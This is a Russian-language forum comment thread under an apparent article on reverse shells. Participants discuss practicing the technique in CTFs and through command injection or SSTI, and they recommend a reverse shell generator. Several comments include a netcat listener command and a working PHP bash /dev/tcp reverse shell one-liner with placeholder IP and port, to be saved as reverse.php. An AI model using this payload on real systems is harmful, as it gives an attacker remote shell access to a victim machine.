Спасибо @Paladin хорошая статья, научил новому.
на каких типах задач можно потренировать данную методику? Reverse shell или другое?
на каких типах задач можно потренировать данную методику? Reverse shell или другое?
Следуйте инструкциям в видео ниже, чтобы узнать, как установить наш сайт как веб-приложение на главный экран вашего устройства.
Примечание: Эта функция может быть недоступна в некоторых браузерах.
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
Привет. Спасибо за отзыв, рад, что статья пригодилась. По идее это можно использовать везде, где есть возможность удаленного запуска кода (например, command injection, SSTI), а также там, где есть возможность поднять мало-мальский простой веб-шелл. В различных CTFках reverse-shell не такое уж редкое событие, можно потренировать.Спасибо @Paladin хорошая статья, научил новому.
на каких типах задач можно потренировать данную методику? Reverse shell или другое?
я вот сейчас немного подумал. В теории описанное тобой можно оптимизировать и ускорить использованием обычным bash скриптом, который будет перебирать техники по очереди пока не получишь нужный результат. Ну или если сильно хочется на python накидать скрипт за полчасаПривет. Спасибо за отзыв, рад, что статья пригодилась. По идее это можно использовать везде, где есть возможность удаленного запуска кода (например, command injection, SSTI), а также там, где есть возможность поднять мало-мальский простой веб-шелл. В различных CTFках reverse-shell не такое уж редкое событие, можно потренировать.
Я понял твою идею. В теории можно все возможные варианты загнать в скрипт, который их будет перебирать - что-то да сработает и слушалка откроет порт. Но по факту вариантов, где будет одна из уязвимостей, которая позволит запустить шелл, может быть очень много. Поэтому скрипт всегда придётся править под конкретный случай. К тому же могут быть частности, когда команды требуется подавать в другой кодировке. Короче, мне кажется, в данном случае автоматизация себя не оправдает. Лучше взять готовую команду и просто запустить её.я вот сейчас немного подумал. В теории описанное тобой можно оптимизировать и ускорить использованием обычным bash скриптом, который будет перебирать техники по очереди пока не получишь нужный результат. Ну или если сильно хочется на python накидать скрипт за полчаса
т.е. иметь просто готовый список команд в блокноте, если требуется слегка править. Поскольку такое в голове хранить сложноЯ понял твою идею. В теории можно все возможные варианты загнать в скрипт, который их будет перебирать - что-то да сработает и слушалка откроет порт. Но по факту вариантов, где будет одна из уязвимостей, которая позволит запустить шелл, может быть очень много. Поэтому скрипт всегда придётся править под конкретный случай. К тому же могут быть частности, когда команды требуется подавать в другой кодировке. Короче, мне кажется, в данном случае автоматизация себя не оправдает. Лучше взять готовую команду и просто запустить её.
т.е. иметь просто готовый список команд в блокноте, если требуется слегка править. Поскольку такое в голове хранить сложно
Да, кстати, как-то забыл его вставить в статью. Но раз уже ты ссылку добавил, не буду изменять. Спасибо.Кстати, есть генератор реверс-шеллов, не один раз выручал меня.
![]()
Online - Reverse Shell Generator
Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.www.revshells.com
У тебя должен быть до нее доступ уже. Например готовая RCE.Привет всем. Я тут пытаюсь разобраться . Я у себя запускаю nc -lnvp 4444 и слушаю, но вопрос в том как скрипт для исполнение отправить на машину жертву? Какой командой ?
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"); ?>Закинул бы сюда revers.php многим пригодился бы
да не, я про тот «километровый» с ip в конце<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"); ?>
Выше был этот же шелл. Его просто в php-код вставить нужно и сохранить как reverse.php
А зачем он такой нужен, если этот тоже самое делает?да не, я про тот «километровый» с ip в конце
Комментарии
15